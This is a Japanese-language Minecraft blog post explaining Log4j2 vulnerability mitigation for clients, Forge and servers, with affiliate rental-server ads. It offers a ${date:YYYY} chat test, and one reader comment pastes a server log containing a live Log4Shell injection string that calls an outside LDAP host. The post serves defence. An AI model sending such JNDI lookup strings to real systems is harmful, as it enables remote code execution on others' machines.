MENU
揚げたてのポテト
初めまして、揚げたてのポテトといいます!
普段はYouTubeでマイクラ企画という様々な企画を配信しています。
良ければ参加よろしくお願いします!!
当サイトではマインクラフトに関連した記事を分かりやすくをモットーに書いていきます。
アーカイブ
【おすすめ記事】マイクラサーバーを立てるならConoHa VPS!【MOD/プラグイン対応】

【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】

揚げたてのポテト

こんにちわ、揚げたてのポテトです。

ポテコちゃん

どうもー!助手のポテ子ちゃんです!

揚げたてのポテト

先日、Log4j2の脆弱性に関する問題が話題になりましたね。

ポテコちゃん

え!?そうなの?初耳なんだけど…

揚げたてのポテト

マイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はよく分からない人のために対応方法をまとめてみました。

当記事では、Log4j2の脆弱性に関する問題でマインクラフトでの対応方法をまとめた記事になります。

目次

Log4j2問題って何?

ポテコちゃん

ところでLog4j2問題ってどんなの?

マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。

今回、このLog4j2にて重大な脆弱性が発見されたため、大きく話題になりました。

脆弱性とは、プログラムの不具合や設計上のミスが原因となって発生したセキュリティ上の欠陥のこと

2021年12月10日にMinecraftの関連団体よりクライアント及びサーバーに関する重大な脆弱性が見つかったとの警告が発表されました。

マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。

要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題です。

そのため、マインクラフトではこの問題に対応するべく、クライアント側やサーバー側で対処する必要があります。

このLog4j2問題はほぼ全てのバージョン、全プレイヤーが対象となるので必ず対処する必要があります。

公式クライアントの対処方法

公式クライアント(公式ランチャー)では、2021年12月10日以降よりLog4j2問題に対するパッチ(修正プログラム)が更新されました。

このパッチは、公式ランチャーを起動すれば自動的にパッチが適用されるのでクライアント側の対処方法はこれで完了です。

そのため、以前と同じく好きなバージョンで遊ぶことができるようになりました。

【追記】新ランチャーや旧ランチャーでも対応しているとのこと

Forgeクライアントの対応方法

次にMODで遊ぶ際に主にForgeを導入してプレイすると思います。

その時に公式クライアントではなく、Forgeクライアントになるので上記の対策が適用されません。

そのため、Forgeをダウンロードするときにパッチが適用されたForgeをダウンロードする必要があります。

揚げたてのポテト

以下にバージョンごとにまとめたので参考にしてください。

  • 1.18.1以降:最初からパッチ適用
  • 1.18:バージョン38.0.17以降よりパッチ適用
  • 1.17.1:バージョン37.1.1以降よりパッチ適用
  • 1.16.5:バージョン36.2.20以降よりパッチ適用
  • 1.15.2:バージョン31.2.57以降よりパッチ適用
  • 1.14.4:バージョン28.2.25以降よりパッチ適用
  • 1.13.2:バージョン25.0.222以降よりパッチ適用
  • 1.12.2:バージョン2-14.23.5.2857以降よりパッチ適用
  • 1.11.2以下のバージョンは現時点ではパッチはありません。

サーバー側の対処方法

マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによってそれぞれ対処方法が異なりますので、注意してください。

バージョン1.18.1以降は既にパッチが適用されているので特に対処する必要はありません。

Minecraft Realmsも既にパッチが適用されています。

\当サイトがおすすめしたいマイクラのレンタルサーバー/

\当サイトがおすすめしたいマイクラのレンタルサーバー/

スクロールできます
レンタルサーバー特徴

ConoHa VPS
バニラ/MOD/プラグイン
高性能で安定したサーバーを提供
バニラサーバーが自動構築だから初心者でもすぐ遊べる
初回利用は800円クーポンが貰える
3ヶ月以上利用する方はVPS割引きっぷの料金がおトク

Xserver VPS
バニラ/MOD/プラグイン
バニラサーバーが自動構築だからすぐ遊べる
圧倒的低価格で高性能&高速回線サーバーを提供
特に12ヶ月以上の料金がおトク
マイクラサーバーの設定が初心者でも分かりやすい

Agames
バニラ/MOD/プラグインサーバーが自動構築
学生向けの割引で月額料金から15%~25%割引
新しくEpycプランが登場!
マイクラサーバーに詳しいサポーターが充実してる

レンタルサーバーはこんな人におすすめ!

「パソコンの性能(スペック)が足りない」

「ポート開放が上手くできない」

「難しくてよく分からない」

揚げたてのポテト

当サイトでは、上記のレンタルサーバーを徹底解説しているので初めての方でも分かりやすいと好評です!

脆弱性の確認方法

きちんと対策できているか不安の方は以下のコードをマイクラチャットで実行して確認することができます。

${date:YYYY}

上記のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。

この時に「2022」(現在の西暦)と表示されなければ対策できています。

最後に

取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。

Log4j2の脆弱性は大変危険な問題です。

サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対処を行いましょう!

揚げたてのポテト

最後まで読んでいただきありがとうございました。
次回の記事でお会いしましょう!

4.3 21 総投票数
\ この記事を評価 /
【第1弾】当サイトに対するアンケートにご協力ください。(30秒程度)

    当サイトをより良くするためにアンケートにご協力ください。(30秒程度)

    性別必須

    年代必須

    どの機種から見ていますか?必須

    当サイトをどこで知りましたか?必須

    どのSNSで知りましたか?

    当サイトの公式Twitterを知っていますか?必須
    ※当サイトの新着記事やお知らせなどをいち早く知ることができます。

    フォローしてない理由があれば教えてください。

    当サイトの印象はどれに当てはまりますか?(複数回答可)必須

    分かりにくい・読みにくい・その他と回答した理由を教えてください。

    当サイトは表示速度はいかがですか?必須

    当サイトに対する満足度を10段階で評価してください。必須
    ※数字が大きいほど満足度がある評価です。

    最後に当サイトに対する改善点や感想、こんな記事が欲しいなどの要望があれば教えてください。

    \当サイトがおすすめしたいマイクラのレンタルサーバー/

    \当サイトがおすすめしたいマイクラのレンタルサーバー/

    スクロールできます
    レンタルサーバー特徴

    ConoHa VPS
    バニラ/MOD/プラグイン
    高性能で安定したサーバーを提供
    バニラサーバーが自動構築だから初心者でもすぐ遊べる
    初回利用は800円クーポンが貰える
    3ヶ月以上利用する方はVPS割引きっぷの料金がおトク

    Xserver VPS
    バニラ/MOD/プラグイン
    バニラサーバーが自動構築だからすぐ遊べる
    圧倒的低価格で高性能&高速回線サーバーを提供
    特に12ヶ月以上の料金がおトク
    マイクラサーバーの設定が初心者でも分かりやすい

    Agames
    バニラ/MOD/プラグインサーバーが自動構築
    学生向けの割引で月額料金から15%~25%割引
    新しくEpycプランが登場!
    マイクラサーバーに詳しいサポーターが充実してる

    レンタルサーバーはこんな人におすすめ!

    「パソコンの性能(スペック)が足りない」

    「ポート開放が上手くできない」

    「難しくてよく分からない」

    揚げたてのポテト

    当サイトでは、上記のレンタルサーバーを徹底解説しているので初めての方でも分かりやすいと好評です!

    ブログランキングに参戦中です!
    1日1回応援よろしくお願いします!

    「応援する」とカウントされ、ブログランキング上位の道に繋がります。

    この記事が気に入ったら
    フォローしてね!

    よかったらシェアしてね!
    • URLをコピーしました!
    • URLをコピーしました!
    4.3 21 総投票数
    \ この記事を評価 /
    コメントの通知(テスト版)
    受け取る通知
    guest
    25 件のコメント
    インラインフィードバック
    すべてのコメントを表示
    けむろろ

    更新の止まった古いプラグインって使ってても大丈夫ですかね?

    Towa

    PaperMCver1.16未満は
    パッチが適用されていないそうですが
    PaperMCでLog4j2の
    対策をする方法は無いのですか?

    いつきさん

    1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
    [01:13:20] [Server thread/INFO]: Using new advancement loading for [email protected]xxxxx
    [01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
    [01:13:20] [Server thread/INFO]: FermatSleep joined the game
    [01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
    [01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
    [01:13:22] [Server thread/INFO]: FermatSleep left the game

    みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )

    mumei

    現在1.16.5のmod入りサーバーで遊んでいます。
    ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?

    M

    mohistはもうパッチきましたか?

    目次